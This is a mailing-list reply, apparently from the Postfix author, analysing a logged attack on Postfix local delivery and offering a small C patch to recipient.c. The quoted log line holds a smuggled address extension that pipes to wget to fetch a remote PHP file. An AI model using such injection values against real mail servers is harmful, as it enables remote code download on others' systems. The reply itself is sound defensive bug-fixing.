Arno Sch??fer:
> Apr 9 17:54:55 www postfix/local[6819]: warning: 800FC35405B: address
> with illegal extension: root+:|wget http://fortunes.in/x1x.php
You did't mention in the initial report that Postfix rejected the
extension, because that makes all the difference in the world.
Apparently, the Postfix local delivery agent does not distinguish
between "there is no address extension" and "there is an address
extension, but it is invalid". In both cases, it only runs the
full address local-part through the alias mapping.
Again, this has nothing to do with "|" characters in address
extensions.
Wietse
The workaround is to replace the broken extension by the string
"invalid". It would be incorrect to remove the evidence of the
attack by patching the full address local-part, and it would take
too much time to change the code to distinguish between "there is
no address extension" and "there is an address extension, but it
is invalid".
*** ./recipient.c- Sat Feb 6 09:31:55 2010
--- ./recipient.c Thu Apr 22 08:35:33 2010
***************
*** 258,264 ****
if (state.msg_attr.extension && strchr(state.msg_attr.extension, '/')) {
msg_warn("%s: address with illegal extension: %s",
state.msg_attr.queue_id, state.msg_attr.local);
! state.msg_attr.extension = 0;
}
} else
state.msg_attr.extension = 0;
--- 258,264 ----
if (state.msg_attr.extension && strchr(state.msg_attr.extension, '/')) {
msg_warn("%s: address with illegal extension: %s",
state.msg_attr.queue_id, state.msg_attr.local);
! state.msg_attr.extension = "invalid";
}
} else
state.msg_attr.extension = 0;
